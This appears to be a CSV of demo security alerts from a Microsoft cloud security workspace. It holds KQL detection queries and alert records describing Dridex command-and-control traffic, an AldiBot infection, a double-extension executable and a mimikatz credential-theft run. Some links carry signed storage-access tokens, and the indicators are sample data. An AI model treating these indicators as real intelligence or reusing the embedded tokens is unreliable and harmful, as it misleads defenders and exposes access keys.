,TenantId,StartTimeUtc,EndTimeUtc,ProviderAlertId,SystemAlertId,ProviderName,VendorName,AlertType,AlertName,AlertDisplayName,Description,Severity,IsIncident,ExtendedProperties,Entities,ConfidenceLevel,ConfidenceScore,ExtendedLinks,WorkspaceSubscriptionId,WorkspaceResourceGroup,TimeGenerated,ResourceId,SourceComputerId,CompromisedEntity
0,802d39e1-9d70-404d-832c-2de5e2478eda,2019-01-11 06:31:40,2019-01-12 06:31:40,e0c9484b-ad5f-4161-b73b-388676c05818,047f47d6-79b7-4502-824b-97abc4905a73,CustomAlertRule,Alert Rule,DC local group addition - Demo,DC local group addition - Demo,DC local group addition - Demo,Domain controllers local group addition,Low,False,"{
""Alert Mode"": ""Aggregated"",
""Search Query"": ""{\""detailBladeInputs\"":{\""id\"":\""/subscriptions/3c1bb38c-82e3-4f8d-a115-a7110ba70d05/resourcegroups/contoso77/providers/microsoft.operationalinsights/workspaces/contoso77\"",\""parameters\"":{\""q\"":\""SecurityEvent\\n| where EventID == 4625\\n| extend IPCustomEntity = \\\""75.10.91.22\\\""\\n| extend HostCustomEntity = Computer\\n| extend AccountCustomEntity = Account\"",\""timeInterval\"":{\""intervalDuration\"":86400,\""intervalEnd\"":\""2019-01-12T06%3A31%3A40.000Z\""}}},\""detailBlade\"":\""SearchBlade\"",\""displayValue\"":\""SecurityEvent\\n| where EventID == 4625\\n| extend IPCustomEntity = \\\""75.10.91.22\\\""\\n| extend HostCustomEntity = Computer\\n| extend AccountCustomEntity = Account\"",\""extension\"":\""Microsoft_OperationsManagementSuite_Workspace\"",\""kind\"":\""OpenBlade\""}"",
""Search Query Results Overall Count"": ""23034"",
""Threshold Operator"": ""Greater Than"",
""Threshold Value"": ""10000"",
""Query Interval in Minutes"": ""1440"",
""Suppression in Minutes"": ""800"",
""Total Account Entities"": ""1563"",
""Total IP Entities"": ""1"",
""Total Host Entities"": ""1""
}","[
{
""$id"": ""3"",
""Address"": ""75.10.91.22"",
""Type"": ""ip"",
""Count"": 23034
},
{
""$id"": ""4"",
""HostName"": ""DHCPContoso77"",
""Type"": ""host"",
""Count"": 23034
},
{
""$id"": ""5"",
""Name"": ""ADMINISTRATOR"",
""NTDomain"": """",
""Host"": {
""$ref"": ""4""
},
""IsDomainJoined"": false,
""Type"": ""account"",
""Count"": 5909
},
{
""$id"": ""6"",
""Name"": ""ADMIN"",
""NTDomain"": """",
""Host"": {
""$ref"": ""4""
},
""IsDomainJoined"": false,
""Type"": ""account"",
""Count"": 878
},
{
""$id"": ""7"",
""Name"": ""USER"",
""NTDomain"": """",
""Host"": {
""$ref"": ""4""
},
""IsDomainJoined"": false,
""Type"": ""account"",
""Count"": 486
}
]",Unknown,,,3c1bb38c-82e3-4f8d-a115-a7110ba70d05,contoso77,2019-01-12 06:41:44,,,
1,802d39e1-9d70-404d-832c-2de5e2478eda,2019-01-11 06:31:42,2019-01-12 06:31:42,8095ce01-1a2f-4973-95bb-bb46ee6c8016,2d06cb42-bdff-426d-8091-ccc151bcbc94,CustomAlertRule,Alert Rule,Palo Alto admin logged on via SSH - Demo,Palo Alto admin logged on via SSH - Demo,Palo Alto admin logged on via SSH - Demo,Palo Alto admin logged on via SSH - Demo,Medium,False,"{
""Alert Mode"": ""Aggregated"",
""Search Query"": ""{\""detailBladeInputs\"":{\""id\"":\""/subscriptions/3c1bb38c-82e3-4f8d-a115-a7110ba70d05/resourcegroups/contoso77/providers/microsoft.operationalinsights/workspaces/contoso77\"",\""parameters\"":{\""q\"":\""SecurityEvent\\n| where EventID == 4625\\n| extend IPCustomEntity = \\\""92.52.10.25\\\""\\n| extend HostCustomEntity = Computer\\n| extend AccountCustomEntity = Account\"",\""timeInterval\"":{\""intervalDuration\"":86400,\""intervalEnd\"":\""2019-01-12T06%3A31%3A42.000Z\""}}},\""detailBlade\"":\""SearchBlade\"",\""displayValue\"":\""SecurityEvent\\n| where EventID == 4625\\n| extend IPCustomEntity = \\\""92.52.10.25\\\""\\n| extend HostCustomEntity = Computer\\n| extend AccountCustomEntity = Account\"",\""extension\"":\""Microsoft_OperationsManagementSuite_Workspace\"",\""kind\"":\""OpenBlade\""}"",
""Search Query Results Overall Count"": ""23035"",
""Threshold Operator"": ""Greater Than"",
""Threshold Value"": ""10000"",
""Query Interval in Minutes"": ""1440"",
""Suppression in Minutes"": ""2000"",
""Total Account Entities"": ""1563"",
""Total IP Entities"": ""1"",
""Total Host Entities"": ""1""
}","[
{
""$id"": ""3"",
""Address"": ""92.52.10.25"",
""Type"": ""ip"",
""Count"": 23035
},
{
""$id"": ""4"",
""HostName"": ""DHCPContoso77"",
""Type"": ""host"",
""Count"": 23035
},
{
""$id"": ""5"",
""Name"": ""ADMINISTRATOR"",
""NTDomain"": """",
""Host"": {
""$ref"": ""4""
},
""IsDomainJoined"": false,
""Type"": ""account"",
""Count"": 5909
},
{
""$id"": ""6"",
""Name"": ""ADMIN"",
""NTDomain"": """",
""Host"": {
""$ref"": ""4""
},
""IsDomainJoined"": false,
""Type"": ""account"",
""Count"": 878
},
{
""$id"": ""7"",
""Name"": ""USER"",
""NTDomain"": """",
""Host"": {
""$ref"": ""4""
},
""IsDomainJoined"": false,
""Type"": ""account"",
""Count"": 486
}
]",Unknown,,,3c1bb38c-82e3-4f8d-a115-a7110ba70d05,contoso77,2019-01-12 06:41:47,,,
2,802d39e1-9d70-404d-832c-2de5e2478eda,2019-01-11 06:33:55,2019-01-12 06:33:55,49828d69-d59e-4c47-80c2-8d62203bbd87,412ca580-63c8-4fd2-87e4-87b1ba4260b3,CustomAlertRule,Alert Rule,DC with MS AM engine failure - Demo,DC with MS AM engine failure - Demo,DC with MS AM engine failure - Demo,Domain controllers with Microsoft antimalware core engine failure,Low,False,"{
""Alert Mode"": ""Aggregated"",
""Search Query"": ""{\""detailBladeInputs\"":{\""id\"":\""/subscriptions/3c1bb38c-82e3-4f8d-a115-a7110ba70d05/resourcegroups/contoso77/providers/microsoft.operationalinsights/workspaces/contoso77\"",\""parameters\"":{\""q\"":\""SecurityEvent\\n| where EventID == 4625\"",\""timeInterval\"":{\""intervalDuration\"":86400,\""intervalEnd\"":\""2019-01-12T06%3A33%3A55.000Z\""}}},\""detailBlade\"":\""SearchBlade\"",\""displayValue\"":\""SecurityEvent\\n| where EventID == 4625\"",\""extension\"":\""Microsoft_OperationsManagementSuite_Workspace\"",\""kind\"":\""OpenBlade\""}"",
""Search Query Results Overall Count"": ""23036"",
""Threshold Operator"": ""Greater Than"",
""Threshold Value"": ""0"",
""Query Interval in Minutes"": ""1440"",
""Suppression in Minutes"": ""0""
}",,Unknown,,,3c1bb38c-82e3-4f8d-a115-a7110ba70d05,contoso77,2019-01-12 06:43:59,,,
3,802d39e1-9d70-404d-832c-2de5e2478eda,2019-01-11 19:18:10,2019-01-11 20:18:10,bf604b0c-073d-4f94-a73e-fd99ac8364ea,42a8b425-1c41-4355-8343-18ad563c43b6,CustomAlertRule,Alert Rule,Suspicious Account Added,Suspicious Account Added,Suspicious Account Added,Account added and removed from group within 24h,Medium,False,"{
""Alert Mode"": ""Aggregated"",
""Search Query"": ""{\""detailBladeInputs\"":{\""id\"":\""/subscriptions/3c1bb38c-82e3-4f8d-a115-a7110ba70d05/resourcegroups/contoso77/providers/microsoft.operationalinsights/workspaces/contoso77\"",\""parameters\"":{\""q\"":\""OfficeActivity\\n| where Operation in (\\\""Add member to group.\\\"", \\\""Remove member from group.\\\"") \\n| project TimeGenerated, Operation, user=todynamic(AADTarget)[0].ID\\n| summarize operations=dcount(Operation) by tostring(user), bin(TimeGenerated, 1d)\\n| where operations>1 and user startswith \\\""User\\\""\"",\""timeInterval\"":{\""intervalDuration\"":3600,\""intervalEnd\"":\""2019-01-11T20%3A18%3A10.000Z\""}}},\""detailBlade\"":\""SearchBlade\"",\""displayValue\"":\""OfficeActivity\\n| where Operation in (\\\""Add member to group.\\\"", \\\""Remove member from group.\\\"") \\n| project TimeGenerated, Operation, user=todynamic(AADTarget)[0].ID\\n| summarize operations=dcount(Operation) by tostring(user), bin(TimeGenerated, 1d)\\n| where operations>1 and user startswith \\\""User\\\""\"",\""extension\"":\""Microsoft_OperationsManagementSuite_Workspace\"",\""kind\"":\""OpenBlade\""}"",
""Search Query Results Overall Count"": ""1"",
""Threshold Operator"": ""Greater Than"",
""Threshold Value"": ""0"",
""Query Interval in Minutes"": ""60"",
""Suppression in Minutes"": ""720""
}",,Unknown,,,3c1bb38c-82e3-4f8d-a115-a7110ba70d05,contoso77,2019-01-11 20:28:14,,,
4,802d39e1-9d70-404d-832c-2de5e2478eda,2019-01-10 05:38:06,2019-01-11 05:38:06,8c6c4eb9-dbd8-4484-b317-54d7d766f87b,401f2680-cc05-4e6f-a1f6-69cff2055cd9,CustomAlertRule,Alert Rule,Global domain trust creation - Demo,Global domain trust creation - Demo,Global domain trust creation - Demo,Global domain trust was created on Active Directory,High,False,"{
""Alert Mode"": ""Aggregated"",
""Search Query"": ""{\""detailBladeInputs\"":{\""id\"":\""/subscriptions/3c1bb38c-82e3-4f8d-a115-a7110ba70d05/resourcegroups/contoso77/providers/microsoft.operationalinsights/workspaces/contoso77\"",\""parameters\"":{\""q\"":\""SecurityEvent\\n| where EventID == 4625\\n| extend IPCustomEntity = \\\""23.54.94.45\\\""\\n| extend HostCustomEntity = Computer\\n| extend AccountCustomEntity = \\\""[email protected]\\\""\"",\""timeInterval\"":{\""intervalDuration\"":86400,\""intervalEnd\"":\""2019-01-11T05%3A38%3A06.000Z\""}}},\""detailBlade\"":\""SearchBlade\"",\""displayValue\"":\""SecurityEvent\\n| where EventID == 4625\\n| extend IPCustomEntity = \\\""23.54.94.45\\\""\\n| extend HostCustomEntity = Computer\\n| extend AccountCustomEntity = \\\""[email protected]\\\""\"",\""extension\"":\""Microsoft_OperationsManagementSuite_Workspace\"",\""kind\"":\""OpenBlade\""}"",
""Search Query Results Overall Count"": ""14285"",
""Threshold Operator"": ""Greater Than"",
""Threshold Value"": ""1"",
""Query Interval in Minutes"": ""1440"",
""Suppression in Minutes"": ""1000"",
""Total IP Entities"": ""1"",
""Total Host Entities"": ""1"",
""Total Account Entities"": ""1""
}","[
{
""$id"": ""3"",
""Address"": ""23.54.94.45"",
""Type"": ""ip"",
""Count"": 14285
},
{
""$id"": ""4"",
""HostName"": ""DHCPContoso77"",
""Type"": ""host"",
""Count"": 14285
},
{
""$id"": ""5"",
""Name"": ""brians"",
""UPNSuffix"": ""ContosoSI.onmicrosoft.com"",
""IsDomainJoined"": true,
""Type"": ""account"",
""Count"": 14285
}
]",Unknown,,,3c1bb38c-82e3-4f8d-a115-a7110ba70d05,contoso77,2019-01-11 05:48:11,,,
5,802d39e1-9d70-404d-832c-2de5e2478eda,2019-01-10 06:25:57,2019-01-11 06:25:57,d950c52d-fcaf-43f4-b68b-2d3fea13b417,b5786d68-7f5e-4be1-92e6-e255010d1d8c,CustomAlertRule,Alert Rule,Maliciuos IP communication,Maliciuos IP communication,Maliciuos IP communication,Malicious IP communication was identified based on threat intelligence (TI),High,False,"{
""Alert Mode"": ""Aggregated"",
""Search Query"": ""{\""detailBladeInputs\"":{\""id\"":\""/subscriptions/3c1bb38c-82e3-4f8d-a115-a7110ba70d05/resourcegroups/contoso77/providers/microsoft.operationalinsights/workspaces/contoso77\"",\""parameters\"":{\""q\"":\""SecurityEvent\\n| where EventID == 4625\\n| extend IPCustomEntity = \\\""80.10.26.89\\\""\\n| extend HostCustomEntity = Computer\\n| extend AccountCustomEntity = Account\"",\""timeInterval\"":{\""intervalDuration\"":86400,\""intervalEnd\"":\""2019-01-11T06%3A25%3A57.000Z\""}}},\""detailBlade\"":\""SearchBlade\"",\""displayValue\"":\""SecurityEvent\\n| where EventID == 4625\\n| extend IPCustomEntity = \\\""80.10.26.89\\\""\\n| extend HostCustomEntity = Computer\\n| extend AccountCustomEntity = Account\"",\""extension\"":\""Microsoft_OperationsManagementSuite_Workspace\"",\""kind\"":\""OpenBlade\""}"",
""Search Query Results Overall Count"": ""14596"",
""Threshold Operator"": ""Greater Than"",
""Threshold Value"": ""1"",
""Query Interval in Minutes"": ""1440"",
""Suppression in Minutes"": ""0"",
""Total Account Entities"": ""2018"",
""Total Host Entities"": ""1"",
""Total IP Entities"": ""1""
}","[
{
""$id"": ""3"",
""Address"": ""80.10.26.89"",
""Type"": ""ip"",
""Count"": 14596
},
{
""$id"": ""4"",
""HostName"": ""DHCPContoso77"",
""Type"": ""host"",
""Count"": 14596
},
{
""$id"": ""5"",
""Name"": ""ADMINISTRATOR"",
""NTDomain"": """",
""Host"": {
""$ref"": ""4""
},
""IsDomainJoined"": false,
""Type"": ""account"",
""Count"": 6695
},
{
""$id"": ""6"",
""Name"": ""ADMIN"",
""NTDomain"": """",
""Host"": {
""$ref"": ""4""
},
""IsDomainJoined"": false,
""Type"": ""account"",
""Count"": 662
},
{
""$id"": ""7"",
""Name"": ""USER"",
""NTDomain"": """",
""Host"": {
""$ref"": ""4""
},
""IsDomainJoined"": false,
""Type"": ""account"",
""Count"": 185
}
]",Unknown,,,3c1bb38c-82e3-4f8d-a115-a7110ba70d05,contoso77,2019-01-11 06:36:03,,,
6,802d39e1-9d70-404d-832c-2de5e2478eda,2019-01-10 06:31:40,2019-01-11 06:31:40,8a3d199d-ff45-4620-aad9-95c2a354fcd1,01659bf1-1228-4e46-b73b-e7d173d365eb,CustomAlertRule,Alert Rule,DC local group addition - Demo,DC local group addition - Demo,DC local group addition - Demo,Domain controllers local group addition,Low,False,"{
""Alert Mode"": ""Aggregated"",
""Search Query"": ""{\""detailBladeInputs\"":{\""id\"":\""/subscriptions/3c1bb38c-82e3-4f8d-a115-a7110ba70d05/resourcegroups/contoso77/providers/microsoft.operationalinsights/workspaces/contoso77\"",\""parameters\"":{\""q\"":\""SecurityEvent\\n| where EventID == 4625\\n| extend IPCustomEntity = \\\""75.10.91.22\\\""\\n| extend HostCustomEntity = Computer\\n| extend AccountCustomEntity = Account\"",\""timeInterval\"":{\""intervalDuration\"":86400,\""intervalEnd\"":\""2019-01-11T06%3A31%3A40.000Z\""}}},\""detailBlade\"":\""SearchBlade\"",\""displayValue\"":\""SecurityEvent\\n| where EventID == 4625\\n| extend IPCustomEntity = \\\""75.10.91.22\\\""\\n| extend HostCustomEntity = Computer\\n| extend AccountCustomEntity = Account\"",\""extension\"":\""Microsoft_OperationsManagementSuite_Workspace\"",\""kind\"":\""OpenBlade\""}"",
""Search Query Results Overall Count"": ""14632"",
""Threshold Operator"": ""Greater Than"",
""Threshold Value"": ""10000"",
""Query Interval in Minutes"": ""1440"",
""Suppression in Minutes"": ""800"",
""Total Account Entities"": ""2023"",
""Total IP Entities"": ""1"",
""Total Host Entities"": ""1""
}","[
{
""$id"": ""3"",
""Address"": ""75.10.91.22"",
""Type"": ""ip"",
""Count"": 14632
},
{
""$id"": ""4"",
""HostName"": ""DHCPContoso77"",
""Type"": ""host"",
""Count"": 14632
},
{
""$id"": ""5"",
""Name"": ""ADMINISTRATOR"",
""NTDomain"": """",
""Host"": {
""$ref"": ""4""
},
""IsDomainJoined"": false,
""Type"": ""account"",
""Count"": 6725
},
{
""$id"": ""6"",
""Name"": ""ADMIN"",
""NTDomain"": """",
""Host"": {
""$ref"": ""4""
},
""IsDomainJoined"": false,
""Type"": ""account"",
""Count"": 662
},
{
""$id"": ""7"",
""Name"": ""USER"",
""NTDomain"": """",
""Host"": {
""$ref"": ""4""
},
""IsDomainJoined"": false,
""Type"": ""account"",
""Count"": 184
}
]",Unknown,,,3c1bb38c-82e3-4f8d-a115-a7110ba70d05,contoso77,2019-01-11 06:41:44,,,
7,802d39e1-9d70-404d-832c-2de5e2478eda,2019-01-10 06:31:42,2019-01-11 06:31:42,39dff905-8e4d-48bc-b028-60a12a02ae62,0ce6ad61-302a-4142-8eaa-4da9dfad9ca9,CustomAlertRule,Alert Rule,Palo Alto admin logged on via SSH - Demo,Palo Alto admin logged on via SSH - Demo,Palo Alto admin logged on via SSH - Demo,Palo Alto admin logged on via SSH - Demo,Medium,False,"{
""Alert Mode"": ""Aggregated"",
""Search Query"": ""{\""detailBladeInputs\"":{\""id\"":\""/subscriptions/3c1bb38c-82e3-4f8d-a115-a7110ba70d05/resourcegroups/contoso77/providers/microsoft.operationalinsights/workspaces/contoso77\"",\""parameters\"":{\""q\"":\""SecurityEvent\\n| where EventID == 4625\\n| extend IPCustomEntity = \\\""92.52.10.25\\\""\\n| extend HostCustomEntity = Computer\\n| extend AccountCustomEntity = Account\"",\""timeInterval\"":{\""intervalDuration\"":86400,\""intervalEnd\"":\""2019-01-11T06%3A31%3A42.000Z\""}}},\""detailBlade\"":\""SearchBlade\"",\""displayValue\"":\""SecurityEvent\\n| where EventID == 4625\\n| extend IPCustomEntity = \\\""92.52.10.25\\\""\\n| extend HostCustomEntity = Computer\\n| extend AccountCustomEntity = Account\"",\""extension\"":\""Microsoft_OperationsManagementSuite_Workspace\"",\""kind\"":\""OpenBlade\""}"",
""Search Query Results Overall Count"": ""14632"",
""Threshold Operator"": ""Greater Than"",
""Threshold Value"": ""10000"",
""Query Interval in Minutes"": ""1440"",
""Suppression in Minutes"": ""2000"",
""Total Account Entities"": ""2023"",
""Total Host Entities"": ""1"",
""Total IP Entities"": ""1""
}","[
{
""$id"": ""3"",
""Address"": ""92.52.10.25"",
""Type"": ""ip"",
""Count"": 14632
},
{
""$id"": ""4"",
""HostName"": ""DHCPContoso77"",
""Type"": ""host"",
""Count"": 14632
},
{
""$id"": ""5"",
""Name"": ""ADMINISTRATOR"",
""NTDomain"": """",
""Host"": {
""$ref"": ""4""
},
""IsDomainJoined"": false,
""Type"": ""account"",
""Count"": 6725
},
{
""$id"": ""6"",
""Name"": ""ADMIN"",
""NTDomain"": """",
""Host"": {
""$ref"": ""4""
},
""IsDomainJoined"": false,
""Type"": ""account"",
""Count"": 662
},
{
""$id"": ""7"",
""Name"": ""USER"",
""NTDomain"": """",
""Host"": {
""$ref"": ""4""
},
""IsDomainJoined"": false,
""Type"": ""account"",
""Count"": 184
}
]",Unknown,,,3c1bb38c-82e3-4f8d-a115-a7110ba70d05,contoso77,2019-01-11 06:41:47,,,
8,802d39e1-9d70-404d-832c-2de5e2478eda,2019-01-10 06:33:55,2019-01-11 06:33:55,55e93ac7-ee7d-4fd7-ae7b-d64ef41df393,df9f92cb-6fd2-469b-9b72-28f128df1adf,CustomAlertRule,Alert Rule,DC with MS AM engine failure - Demo,DC with MS AM engine failure - Demo,DC with MS AM engine failure - Demo,Domain controllers with Microsoft antimalware core engine failure,Low,False,"{
""Alert Mode"": ""Aggregated"",
""Search Query"": ""{\""detailBladeInputs\"":{\""id\"":\""/subscriptions/3c1bb38c-82e3-4f8d-a115-a7110ba70d05/resourcegroups/contoso77/providers/microsoft.operationalinsights/workspaces/contoso77\"",\""parameters\"":{\""q\"":\""SecurityEvent\\n| where EventID == 4625\"",\""timeInterval\"":{\""intervalDuration\"":86400,\""intervalEnd\"":\""2019-01-11T06%3A33%3A55.000Z\""}}},\""detailBlade\"":\""SearchBlade\"",\""displayValue\"":\""SecurityEvent\\n| where EventID == 4625\"",\""extension\"":\""Microsoft_OperationsManagementSuite_Workspace\"",\""kind\"":\""OpenBlade\""}"",
""Search Query Results Overall Count"": ""14654"",
""Threshold Operator"": ""Greater Than"",
""Threshold Value"": ""0"",
""Query Interval in Minutes"": ""1440"",
""Suppression in Minutes"": ""0""
}",,Unknown,,,3c1bb38c-82e3-4f8d-a115-a7110ba70d05,contoso77,2019-01-11 06:43:58,,,
9,802d39e1-9d70-404d-832c-2de5e2478eda,2019-01-06 05:02:00,2019-01-06 05:02:00,f6291e49-c290-4cd6-8188-abef044198d6,98a6dea6-1b64-41d0-938e-0dec24b234ec,InternalDemo,Microsoft,Network communication with a malicious machine detected,Network communication with a malicious machine detected,Network communication with a malicious machine detected,Network traffic analysis indicates that your machine (IP 1.2.3.4) has communicated with what is possibly a Command and Control center for a malware of type Dridex at IP 183.95.154.13. Dridex is a banking trojan family that steals credentials of online banking websites. Dridex is typically distributed via phishing emails with Microsoft Word and Excel document attachments. These Office documents contain malicious macro code that downloads and installs Dridex on the affected system.,Medium,False,"{
""Attacker Port"": ""80"",
""Attacker IP"": ""183.95.154.13"",
""Victim Port"": ""15421"",
""Victim IP"": ""1.2.3.4"",
""ActionTaken"": ""Detected"",
""resourceType"": ""Virtual Machine""
}","[
{
""$id"": ""4"",
""HostName"": ""vm1"",
""AzureID"": ""/subscriptions/212f9889-769e-45ae-ab43-6da33674bd26/resourcegroups/ASCDEMORG/providers/Microsoft.Compute/virtualMachines/vm1"",
""Type"": ""host""
},
{
""$id"": ""5"",
""Address"": ""183.95.154.13"",
""Location"": {
""CountryCode"": ""CN"",
""CountryName"": ""China"",
""State"": ""Hubei"",
""City"": ""Wuhan"",
""Longitude"": 114.28946,
""Latitude"": 30.55397,
""Asn"": 4837
},
""Type"": ""ip""
}
]",Unknown,,"[
{
""Href"": ""https://prodtasstorageaccount.blob.core.windows.net/reports/MSTI-TS-Malicious-Macros.pdf?sv=2015-07-08&sig=i%2FYVXil2FPsH3Kn4i3jH1uNPC5r9QyYW6wKCc7WJtng%3D&spr=https&se=2017-11-14T13%3A50%3A35Z&srt=o&ss=b&sp=r"",
""Category"": ""enrichment_tas_threat__reports"",
""Label"": ""Report: Malicious Macros"",
""Type"": ""webLink""
},
{
""Href"": ""https://prodtasstorageaccount.blob.core.windows.net/reports/MSTI-TS-Trojan-Downloader-Macros.pdf?sv=2015-07-08&sig=i%2FYVXil2FPsH3Kn4i3jH1uNPC5r9QyYW6wKCc7WJtng%3D&spr=https&se=2017-11-14T13%3A50%3A35Z&srt=o&ss=b&sp=r"",
""Category"": ""enrichment_tas_threat__reports"",
""Label"": ""Report: Trojan Downloader Macros"",
""Type"": ""webLink""
},
{
""Href"": ""https://prodtasstorageaccount.blob.core.windows.net/reports/MSTI-TS-Dridex.pdf?sv=2015-07-08&sig=i%2FYVXil2FPsH3Kn4i3jH1uNPC5r9QyYW6wKCc7WJtng%3D&spr=https&se=2017-11-14T13%3A50%3A35Z&srt=o&ss=b&sp=r"",
""Category"": ""enrichment_tas_threat__reports"",
""Label"": ""Report: Dridex"",
""Type"": ""webLink""
}
]",,,2019-01-12 00:02:51,/subscriptions/212f9889-769e-45ae-ab43-6da33674bd26/resourcegroups/ASCDEMORG/providers/Microsoft.Compute/virtualMachines/vm1,,
10,802d39e1-9d70-404d-832c-2de5e2478eda,2019-01-01 00:02:00,2019-01-01 00:02:00,fd948195-6e81-4f50-91d1-7d7d4fb170f7,62ded865-938b-4bb3-afef-605d692607f1,InternalDemo,Microsoft,Possible compromised machine detected,Possible compromised machine detected,Possible compromised machine detected,"Threat intelligence indicates that your machine (at IP 1.2.3.5) may have been compromised by a malware of type AldiBot. AldiBot is an HTTP-controlled denial-of-service bot - it offers HTTP and TCP DDoS capabilities along with Firefox, Pidgin and jDownloader credential theft, the creation of a SOCKS5 proxy on infected machine, and the ability to download and execute malicious code of the attacker’s choice.",Medium,False,"{
""Machine IP"": ""1.2.3.5"",
""ActionTaken"": ""Detected"",
""resourceType"": ""Virtual Machine""
}","[
{
""$id"": ""4"",
""HostName"": ""vm4"",
""AzureID"": ""/subscriptions/212f9889-769e-45ae-ab43-6da33674bd26/resourcegroups/ASCDEMORG/providers/Microsoft.Compute/virtualMachines/vm4"",
""Type"": ""host""
}
]",Unknown,,,,,2019-01-12 00:02:51,/subscriptions/212f9889-769e-45ae-ab43-6da33674bd26/resourcegroups/ASCDEMORG/providers/Microsoft.Compute/virtualMachines/vm4,,
11,802d39e1-9d70-404d-832c-2de5e2478eda,2019-01-08 05:02:00,2019-01-08 05:02:00,bf226efc-3d3c-4b93-8af3-943a70984792,28f9b83a-33e6-44da-a002-0f48bff46a67,InternalDemo,Microsoft,Possible outgoing spam activity detected,Possible outgoing spam activity detected,Possible outgoing spam activity detected,"Network traffic analysis detected suspicious outgoing traffic from vm1lin. This traffic may be a result of a spam activity.
If this behavior is intentional, please note that sending spam is against Azure Terms of service. If this behavior is unintentional, it may mean your machine has been compromised.",Low,False,"{
""Compromised Host"": ""vm1lin"",
""ActionTaken"": ""Detected"",
""resourceType"": ""Virtual Machine""
}","[
{
""$id"": ""4"",
""HostName"": ""vm1lin"",
""AzureID"": ""/subscriptions/212f9889-769e-45ae-ab43-6da33674bd26/resourcegroups/ASCDEMORG/providers/Microsoft.Compute/virtualMachines/vm1lin"",
""Type"": ""host""
}
]",Unknown,,"[
{
""Href"": ""https://v7cvxo4erctvostor.blob.core.windows.net/20170814-7/MSTI-TS-SpamBots-Email-Flooders.pdf?sv=2015-12-11&sig=PvE1BuQWWjjroAlRQHN8MHzT4qhXpwW%2Fe%2BMfoHPp9t4%3D&spr=https&se=2017-11-21T07%3A13%3A43Z&srt=o&ss=b&sp=r"",
""Category"": ""enrichment_tas_threat__reports"",
""Label"": ""Report: Spambots and email flooders"",
""Type"": ""webLink""
}
]",,,2019-01-12 00:02:51,/subscriptions/212f9889-769e-45ae-ab43-6da33674bd26/resourcegroups/ASCDEMORG/providers/Microsoft.Compute/virtualMachines/vm1lin,,vm1lin
12,802d39e1-9d70-404d-832c-2de5e2478eda,2019-01-03 00:02:00,2019-01-03 00:02:00,5196b3f5-103c-40c2-9783-c7a1f8ce8f34,112dc225-bc2d-4328-97fd-a99e0b000b1f,InternalDemo,Microsoft,Suspicious double extension file executed,Suspicious double extension file executed,Suspicious double extension file executed,Machine logs indicate an execution of a process with a suspicious double extension. This extension may trick users into thinking files are safe to be opened and might indicate the presence of malware on the system.,High,False,"{
""parent process"": ""-"",
""process name"": ""C:\\Documents\\BudgetReport.pdf.exe"",
""command line"": ""C:\\Documents\\BudgetReport.pdf.exe"",
""domain name"": ""Contoso"",
""process id"": ""0xa30"",
""user name"": ""admin"",
""user sid"": ""S-1-5-21-735211308-2936392771-281815312-500"",
""ActionTaken"": ""Detected"",
""resourceType"": ""Virtual Machine""
}","[
{
""$id"": ""4"",
""HostName"": ""vm3"",
""AzureID"": ""/subscriptions/212f9889-769e-45ae-ab43-6da33674bd26/resourcegroups/ASCDEMORG/providers/Microsoft.Compute/virtualMachines/vm3"",
""Type"": ""host""
},
{
""$id"": ""5"",
""Name"": ""admin"",
""NTDomain"": ""contoso"",
""Host"": {
""$ref"": ""4""
},
""IsDomainJoined"": true,
""Type"": ""account""
},
{
""$id"": ""6"",
""Directory"": ""c:\\documents"",
""Name"": ""budgetreport.pdf.exe"",
""Type"": ""file""
},
{
""$id"": ""7"",
""CommandLine"": ""C:\\Documents\\BudgetReport.pdf.exe"",
""ImageFile"": {
""$ref"": ""6""
},
""Account"": {
""$ref"": ""5""
},
""Host"": {
""$ref"": ""4""
},
""Type"": ""process""
}
]",Unknown,,"[
{
""Href"": ""https://v7cvxo4erctvostor.blob.core.windows.net/20170816-13/MSTI-TS-Suspicious-Double-Extensions.pdf?sv=2015-12-11&sig=%2FA6Npq4Z4OtwuiCRsUijXG4YYegL32sPvWyi49zdez0%3D&spr=https&se=2017-11-23T13%3A00%3A28Z&srt=o&ss=b&sp=r"",
""Category"": ""enrichment_tas_threat__reports"",
""Label"": ""Report: Suspicious Double Extensions"",
""Type"": ""webLink""
}
]",,,2019-01-12 00:02:51,/subscriptions/212f9889-769e-45ae-ab43-6da33674bd26/resourcegroups/ASCDEMORG/providers/Microsoft.Compute/virtualMachines/vm3,,
13,802d39e1-9d70-404d-832c-2de5e2478eda,2019-01-03 00:02:00,2019-01-03 00:02:00,31b76dcb-4ddd-4886-a682-589b76b032d9,a32adc3f-43f7-4e5d-b833-98baa71c2f51,InternalDemo,Microsoft,Suspicious process executed,Suspicious process executed,Suspicious process executed,Machine logs indicate that the suspicious Process: 'C:\ProgramFiles\mimikatz.exe' was running with the command line: 'C:\ProgramFiles\mimikatz.exe',High,False,"{
""parent process"": ""-"",
""process name"": ""C:\\ProgramFiles\\mimikatz.exe"",
""command line"": ""C:\\ProgramFiles\\mimikatz.exe"",
""domain name"": ""Contoso"",
""process id"": ""0xa30"",
""user name"": ""admin"",
""user sid"": ""S-1-5-21-735211308-2936392771-281815312-500"",
""ActionTaken"": ""Detected"",
""resourceType"": ""Virtual Machine""
}","[
{
""$id"": ""4"",
""HostName"": ""vm3"",
""AzureID"": ""/subscriptions/212f9889-769e-45ae-ab43-6da33674bd26/resourcegroups/ASCDEMORG/providers/Microsoft.Compute/virtualMachines/vm3"",
""Type"": ""host""
},
{
""$id"": ""5"",
""Name"": ""admin"",
""NTDomain"": ""contoso"",
""Host"": {
""$ref"": ""4""
},
""IsDomainJoined"": true,
""Type"": ""account""
},
{
""$id"": ""6"",
""Directory"": ""c:\\programfiles"",
""Name"": ""mimikatz.exe"",
""Type"": ""file""
},
{
""$id"": ""7"",
""CommandLine"": ""C:\\ProgramFiles\\mimikatz.exe"",
""ImageFile"": {
""$ref"": ""6""
},
""Account"": {
""$ref"": ""5""
},
""Host"": {
""$ref"": ""4""
},
""Type"": ""process""
}
]",Unknown,,"[
{
""Href"": ""https://v7cvxo4erctvostor.blob.core.windows.net/20170816-12/MSTI-TS-Hacker-Tool-Executed.pdf?sv=2015-12-11&sig=zQO96k1RcUqIf4KG85ffMkrj4RjVcOm5F1nQkvjUYXc%3D&spr=https&se=2017-11-23T12%3A58%3A38Z&srt=o&ss=b&sp=r"",
""Category"": ""enrichment_tas_threat__reports"",
""Label"": ""Report: Hacker tool executed"",
""Type"": ""webLink""
}
]",,,2019-01-12 00:02:51,/subscriptions/212f9889-769e-45ae-ab43-6da33674bd26/resourcegroups/ASCDEMORG/providers/Microsoft.Compute/virtualMachines/vm3,,
